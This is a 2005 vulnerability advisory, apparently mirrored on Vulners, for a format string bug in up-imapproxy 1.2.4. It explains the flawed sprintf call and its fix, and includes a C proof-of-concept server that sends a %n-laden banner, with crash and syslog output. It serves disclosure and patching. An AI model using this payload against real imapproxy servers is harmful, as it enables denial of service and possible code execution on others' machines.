Vulners
Lucene search
up-imapproxy-exp.txt
`[.:: ExploiterZ Labs aka Unl0ck Research Team ::.]
Advisory
target: Imapproxy
version: 1.2.4 and earlier
type: format string
remote: yes
vendor: http://imapproxy.org
patch: doesn't exists
[.: Details :.]
Fromat string vulnerability was found in latest version
of IMAP proxy server (up-imapproxy).
Vulnerability exists in:
/up-imapproxy-1.2.4/src/main.c
function: ParseBannerAndCapability();
static int ParseBannerAndCapability( char *DestBuf,
unsigned int DestBufSize,
char *SourceBuf,
unsigned int SourceBufSize )
{
...
SourceBuf[SourceBufSize - 2] = '\0';
CP = strtok( SourceBuf, " " );
...
sprintf( DestBuf, CP );
...
}
This function uses in another function from main.c.
function: SetBannerAndCapability()
static void SetBannerAndCapability( void )
{
...
BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1,
itd.ReadBuf, BytesRead );
...
if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) )
{
syslog(LOG_ERR, "%s: Unexpected response from imap server on initial connection: %s -- Exiting.", fn, Banner);
close( itd.conn->sd );
exit( 1 );
}
...
}
As you can see ParseBannerAndCapability() function calls vulnerable sprintf() without format string.
Correct call must be:
sprintf( DestBuf, "%s", CP );
instead
sprintf( DestBuf, CP );
Vulnerability can be used to execute arbitary code on target's machine.
Imapproxy incorrectly parse banner from IMAP daemon. Look at below PoC code.
[.: PoC :.]
/*
PoC exploit code for up-imapproxy <= 1.2.4
by Darkeagle from ExploiterZ Labs
eagle [ at ] exploiterz [ dot ] org
an exploit binds port (143) and when imapproxy connects to this exploit-server and gets banner, it's child process crashes..
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"
int main ( int argc, char *argv[] )
{
struct sockaddr_in addr, cl_addr;
int sock, cl_sock, addr_size;
char *Iaddr;
socklen_t l;
printf("Imapproxy <= 1.2.4 PoC Exploit\n");
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(143);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
bind(sock, (struct sockaddr*)&addr, sizeof(addr));
listen(sock, 5);
addr_size = sizeof(addr);
while (1)
{
cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
Iaddr = inet_ntoa(cl_addr.sin_addr);
send(cl_sock, BANNER, strlen(BANNER), 0);
printf("IP: %s\n", Iaddr);
}
return 0;
}
[.: Screenshot :.]
.. Child Process crashed ..
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1076593408 (LWP 8279)]
0x401b5904 in vfprintf () from /lib/tls/libc.so.6
(gdb)
...
.. Syslog details ..
[root@localhost bin]# tail -10 /var/log/syslog
....
Oct 28 14:12:55 localhost in.imapproxyd[9201]: SetBannerAndCapability(): Unexpected response from imap server on initial connection: AAAAAAAAAbfffc4ccbfffc4ccbfffc4b45bfffd4e8804afb98056E60^M -- Exiting.
[root@localhost bin]#
[.: Credits :.]
Goes to Darkeagle [ eagle { at } exploiterz { dot } org ]
http://exploiterz.org || http://55k7.org
(c) 2004-2005 Unl0ck Research Team
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Nov 2005 00:00Current